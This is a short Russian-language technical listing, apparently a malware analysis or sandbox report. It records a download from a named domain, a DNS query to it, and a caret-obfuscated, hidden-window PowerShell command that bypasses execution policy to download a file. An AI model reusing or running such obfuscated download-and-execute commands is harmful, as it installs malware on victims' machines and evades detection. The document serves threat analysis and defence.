Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoW^eRSHe^L^L.exe^ -E^XE^c^UTIO^nPoLiC^y BY^Pa^ss -nOp^ROf^I^le -Wi^ndOw^s^t^YlE^ ^H^i^DDeN (neW^-ob^je^ct^ ^SYSt^E^m^.^n^eT.^WeB^CLi^e^Nt)^.DoWN^L^Oa^D^FIlE('http://foota...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "PoW^eRSHe^L^L.exe^ -E^XE^c^UTIO^nPoLiC^y BY^Pa^ss -nOp^ROf^I^le -Wi^ndOw^s^t^YlE^ ^H^i^DDeN (neW^-ob^je^ct^ ^SYSt^E^m^.^n^eT.^WeB^CLi^e^Nt)^.DoWN^L^Oa^D^FIlE('http://foota...' (со скрытым окном)